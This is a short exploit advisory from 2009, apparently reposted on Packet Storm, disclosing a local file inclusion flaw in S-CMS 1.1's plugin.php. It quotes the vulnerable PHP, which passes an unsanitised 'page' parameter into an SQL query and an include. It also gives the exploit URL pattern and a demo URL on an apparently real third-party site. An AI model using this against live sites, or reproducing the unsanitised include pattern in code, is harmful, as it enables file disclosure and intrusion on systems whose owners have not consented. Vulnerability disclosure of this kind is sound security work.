S-CMS version 1.1 suffers from a local file inclusion vulnerability in plugin.php.
4a4a3b0b3843ec7861bccb3ebe429d18983fabf686e09d0c1475bee2cb218a33[~] S-Cms 1.1 Stable (page) LFi
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 29.04.2009
[~]
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com
[~]
[~] msn: trt-turk@hotmail.com
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------
file:
s-cms/plugin.php
code:
$page=$_GET['page']; ( error 1 )
$sql_select_plugin_case= mysql_query("SELECT * FROM ".$prefix."_plugins WHERE active = '1' AND file='$page'");
if ($sql_select_plugin_case){
include "plugins/$page"; (error 2 )
exp:
yildirimordulari.com/s-cms/plugin.php?page=[File]
for demo:
http://www.nonsolomazzini.altervista.org/s-cms/plugin.php?page=[LFi]
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX and all friends
[~]
[~] yildirimordulari.com / experl.com / z0rlu.blogspot.com / dafgamers.com
[~]
[~]----------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed